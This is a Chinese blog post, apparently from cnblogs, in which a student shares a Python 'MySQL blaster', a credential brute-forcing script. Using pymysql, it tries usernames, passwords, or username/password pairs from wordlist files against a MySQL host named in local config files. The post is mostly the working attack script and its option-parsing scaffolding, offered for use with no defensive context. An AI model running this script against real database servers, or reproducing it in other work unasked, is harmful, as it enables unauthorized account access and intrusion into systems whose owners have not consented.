zoukankan      html  css  js  c++  java
  • python 构造mysql爆破器

    前言:

    今天已经期末考完,睡了个觉起床写了个

    mysql爆破器.

    思路:

    1.爆破用户->用户存在的话不会报错反之报错

    2.爆破密码->密码正确不会报错反之报错

    3.用户名和密码一起爆破->用户名和密码正确不会报错反之报错

    用到的模块:

    optparser

    pymysql

    configparser

    os

    代码:

    import pymysql
    import optparse
    import os
    import configparser
    
    def main():
        parser=optparse.OptionParser()
        parser.add_option('-u',dest='username',help='MySQL username of blasting')
        parser.add_option('-p',dest='password',help='MySQL password of blasting')
        parser.add_option('-a',action='store_true',dest='all',help='MySQL all of blasting')
        parser.add_option('-U',dest='zhidinusername',help='Configuration parameters for all: specify user dictionary')
        parser.add_option('-P',dest='zhidinpassword',help='Configuration parameters for all: specify password dictionary')
        (options,args)=parser.parse_args()
        if options.username:
            file=options.username
            usernamepo(file)
        elif options.password:
            file2=options.password
            passwordpo(file2)
        elif options.all and options.zhidinusername and options.zhidinpassword:
            un=options.zhidinusername
            pd=options.zhidinpassword
            allpo(un,pd)
        else:
            parser.print_help()
            exit()
    
    def usernamepo(file):
        cx=open('{}'.format(file),'r')
        if os.path.exists('config.ini'):
            print('[+]Config.ini ok')
        else:
            print('[-]Config.ini Not Found')
            exit()
    
        print('[*]Read the configuration file information')
        cf=configparser.ConfigParser()
        cf.read('config.ini')
        host=cf.get('config','host')
        port=cf.get('config','port')
        password=cf.get('config','password')
        print('[/]-------Config.ini-------')
        print('[+]Host:{}'.format(host))
        print('[+]Port:{}'.format(port))
        print('[+]password{}'.format(password))
    
        print('[/]------User.txt----------')
        if os.path.exists(file):
            print('[+]User.txt ok')
        else:
            print('[-]User.txt Not Found')
    
        print('[/]------Mysql blasting------')
        for k in cx.readlines():
            try:
                db=pymysql.connect(host,k.strip(),password)
                print('[+]Mysql Username in {}'.format(k.strip()))
            except Exception as g:
                print('[-]Not Username:{},and Error{}'.format(k.strip(),g))
    
    
    def passwordpo(file2):
        cx = open('{}'.format(file2), 'r')
        if os.path.exists('config.ini'):
            print('[+]Config.ini ok')
        else:
            print('[-]Config.ini Not Found')
            exit()
    
        print('[*]Read the configuration file information')
        cf = configparser.ConfigParser()
        cf.read('config2.ini')
        host = cf.get('config', 'host')
        port = cf.get('config', 'port')
        username = cf.get('config', 'username')
        print('[/]-------Config.ini-------')
        print('[+]Host:{}'.format(host))
        print('[+]Port:{}'.format(port))
        print('[+]username{}'.format(username))
    
        print('[/]------passwd.txt----------')
        if os.path.exists(file2):
            print('[+]Passwd.txt ok')
        else:
            print('[-]Passwd.txt Not Found')
    
        print('[/]------Mysql blasting------')
        for k in cx.readlines():
            try:
                db = pymysql.connect(host, username, k.strip())
                print('[+]Mysql Password in {}'.format(k.strip()))
            except Exception as g:
                print('[-]Not Password:{},and Error{}'.format(k.strip(), g))
    
    
    def  allpo(un,pd):
        user=open('{}'.format(un),'r')
        passs=open('{}'.format(pd),'r')
        usern=[]
        passn=[]
        if os.path.exists(un):
            print('[+]Username.txt is ok')
        else:
            print('[-]Not Found username.txt')
    
        if os.path.exists(pd):
            print('[+]Password.txt is ok')
        else:
            print('[-]Not Found password.txt')
    
        if os.path.exists('config3.ini'):
            print('[+]Config3.ini ok')
        else:
            print('[-]Config3.ini Not Found')
            exit()
    
        cf=configparser.ConfigParser()
        print('[/---------cofnig3.ini-------]')
        cf.read('config3.ini')
        host=cf.get('config','host')
        print('[+]host:{}'.format(host))
    
        print('[/]------Mysql blasting------')
        for u in user.readlines():
            usern.append(u.strip())
        for y in passs.readlines():
            passn.append(y.strip())
        for g in range(0,len(usern)):
            try:
                dk=pymysql.connect(host,usern[g],passn[g])
                print('[+]Username:{} and password:{}'.format(usern[g],passn[g]))
            except Exception as p:
                print('[-]Not username:{} and password:{} and Error:{}'.format(usern[g],passn[g],p))
    
    
    if __name__ == '__main__':
        main()

    -u测试:

    -p测试:

     -a测试:

    实际连接:

  • 相关阅读:
    浅谈工业无线技术之天线
    防护等级
    PROFINET如何实现实时性
    2020,我又回来了
    关于ReentrantLock和Condition的用法
    当你在试衣间试衣服,请你务必想起wait()与notify()
    用生活例子来解释Java synchronized块
    关于textview显示特殊符号居中的问题
    扯一扯我的2016
    国庆的这6天
  • 原文地址:https://www.cnblogs.com/haq5201314/p/9274219.html
Copyright © 2011-2022 走看看